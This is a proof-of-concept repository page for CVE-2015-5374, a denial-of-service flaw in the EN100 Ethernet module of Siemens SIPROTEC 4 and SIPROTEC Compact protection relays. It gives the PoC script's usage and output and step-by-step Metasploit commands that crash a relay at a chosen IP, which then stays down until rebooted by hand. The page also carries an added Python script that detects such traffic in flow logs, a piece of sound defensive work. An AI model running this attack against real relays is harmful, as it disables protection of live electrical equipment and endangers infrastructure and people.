
CVE-2015-5374 PoC — Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Module Denial of Service Vulnerability

Source
Associated Vulnerability
Title: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Module Denial of Service Vulnerability (CVE-2015-5374)
Description: Siemens SIPROTEC 4 and SIPROTEC Compact are products of Siemens AG (Germany). SIPROTEC 4 is a family of multifunction protection relays with a user-friendly HMI; SIPROTEC Compact is a microprocessor-based protection device. EN100 is the Ethernet communication module used in both. The EN100 module of SIPROTEC 4 and SIPROTEC Compact devices contains a vulnerability that a remote attacker can exploit to cause a denial of service by sending a specially crafted packet to UDP port 50000. Affected: EN100 versions earlier than 4.25
Description
CVE-2015-5374 Denial of Service PoC
Readme
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
====================================
This code sends a specially crafted packet to port 50000/UDP that can cause a denial of service of the affected device. The device does not recover on its own: a manual reboot is required to return it to service, so do not run this against a relay that is protecting live equipment. CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
```
can@exploit:~/siprotec_dos_poc$ python Siemens_SIPROTEC_DoS.py <target>
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
Sending packet to <target> ...
Done, say goodbye!
```
## Metasploit Module

This module sends a specially crafted packet to port 50000/UDP that can cause a denial of service of the affected device. A manual reboot is required to return the device to service.
## Verification Steps

  1. Do: ```use auxiliary/dos/scada/siemens_siprotec4```
  2. Do: ```set RHOST [Target IP]```, replacing ```[Target IP]``` with the IP address you wish to attack.
  3. Do: ```run```
  4. If the target is a SIPROTEC 4 or SIPROTEC Compact device running a vulnerable EN100 version (earlier than V4.25), it crashes immediately and stays down until it is rebooted by hand. The module prints no success or failure verdict (UDP gives no reply), so confirm the result by checking whether the device still answers on its other services.

## Options

  ```set RHOST [Target IP]```, ```set RPORT [Target Port (Default 50000)]```.

## Scenarios

  ```
msf auxiliary(siemens_siprotec4) > info

       Name: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service 
     Module: auxiliary/dos/scada/siemens_siprotec4
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  M. Can Kurnaz

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  50000            yes       The target port (UDP)

Description:
  This module sends a specially crafted packet to port 50000/UDP 
  causing a denial of service of the affected (Siemens SIPROTEC 4 and 
  SIPROTEC Compact) devices. A manual reboot is required to return the 
  device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 
  have been assigned to this vulnerability.

References:
  https://www.exploit-db.com/exploits/44103/
  https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

msf auxiliary(siemens_siprotec4) > show options 

Module options (auxiliary/dos/scada/siemens_siprotec4):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  50000            yes       The target port (UDP)

msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
rhost => 192.168.1.61
msf auxiliary(siemens_siprotec4) > run

[*] Sending DoS packet ... 
[*] Auxiliary module execution completed
msf auxiliary(siemens_siprotec4) > 
```
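The only network artefact of this attack that the page describes is a UDP datagram to port 50000 of the relay's EN100 module, which is also the one thing a defender can look for. The script below is an added detection example, not part of the PoC or the Metasploit module: it scans flow or firewall records for UDP/50000 traffic to known relays from hosts that are not on the engineering-workstation allowlist, and reports which sources swept more than one relay. The `key=value` record format, the relay inventory (`RELAYS`), the allowlist (`ALLOWED_SOURCES`) and the sample records are all assumptions constructed for the example.

```python
"""Added detection example for the CVE-2015-5374 traffic vector: UDP datagrams sent
to port 50000 of a SIPROTEC EN100 module.  It parses constructed key=value flow
records; adapt RECORD_RE to your firewall or NetFlow export format."""
import ipaddress
import re
from dataclasses import dataclass

EN100_UDP_PORT = 50000  # port named in the advisory and used by the PoC

# Assumed inventory (not from the page): relay addresses and the engineering
# hosts permitted to reach them on UDP/50000.  Leave ALLOWED_SOURCES empty to
# alert on every datagram to this port.
RELAYS = {"192.168.1.61", "192.168.1.62"}
ALLOWED_SOURCES = {"192.168.1.10"}

# Constructed sample records (not real capture data).
SAMPLE_LOG = """\
2015-07-21T10:03:12Z proto=udp src=192.168.1.10 sport=52110 dst=192.168.1.61 dport=50000 len=50
2015-07-21T10:03:12Z proto=tcp src=192.168.1.10 sport=52111 dst=192.168.1.61 dport=102 len=60
2015-07-21T10:04:40Z proto=udp src=10.0.0.5 sport=40001 dst=192.168.1.61 dport=50000 len=28
2015-07-21T10:04:41Z proto=udp src=10.0.0.5 sport=40002 dst=192.168.1.62 dport=50000 len=28
2015-07-21T10:05:00Z proto=udp src=192.168.1.10 sport=52112 dst=192.168.1.200 dport=50000 len=50
this line is garbage and must be skipped
"""

RECORD_RE = re.compile(
    r"^(?P<ts>\S+)\s+proto=(?P<proto>\w+)\s+src=(?P<src>\S+)\s+sport=(?P<sport>\d+)"
    r"\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)"
)


@dataclass(frozen=True)
class Alert:
    ts: str
    src: str
    dst: str
    reason: str


def parse_records(log_text):
    """Yield one dict per well-formed record; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            yield m.groupdict()


def normalize(addr):
    """Canonical string form of an IP address, or None if the field is not one."""
    try:
        return str(ipaddress.ip_address(addr))
    except ValueError:
        return None


def find_en100_dos_candidates(log_text, relays=RELAYS, allowed_sources=ALLOWED_SOURCES):
    """Return alerts for UDP/50000 datagrams to a known relay from a non-allowlisted host."""
    alerts = []
    for r in parse_records(log_text):
        if r["proto"].lower() != "udp" or int(r["dport"]) != EN100_UDP_PORT:
            continue
        src, dst = normalize(r["src"]), normalize(r["dst"])
        if src is None or dst not in relays or src in allowed_sources:
            continue
        alerts.append(Alert(r["ts"], src, dst,
                            f"udp/{EN100_UDP_PORT} to SIPROTEC relay from non-engineering host"))
    return alerts


def relays_hit_per_source(alerts):
    """Distinct relays each source targeted; one host sweeping several relays is the stronger signal."""
    hits = {}
    for a in alerts:
        hits.setdefault(a.src, set()).add(a.dst)
    return {src: len(dsts) for src, dsts in hits.items()}


if __name__ == "__main__":
    found = find_en100_dos_candidates(SAMPLE_LOG)
    for a in found:
        print(f"{a.ts} {a.src} -> {a.dst}: {a.reason}")
    print(relays_hit_per_source(found))
```

On the constructed records the script reports the two datagrams from 10.0.0.5 and ignores the engineering host, the TCP flow and the datagram to a non-relay address. Because a successful hit leaves the relay silent until someone reboots it, pair this with an availability check on the relays so that an alert can be correlated with a device that stopped answering.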
File Snapshot

```
[4.0K] /data/pocs/a2a6ee5bb8ed5eaa3584d32d0e72cd5c9501e3a3
├── [2.7K] README.md
├── [1.5K] siemens_siprotec4.rb
└── [1.1K] Siemens_SIPROTEC_DoS.py

0 directories, 3 files
```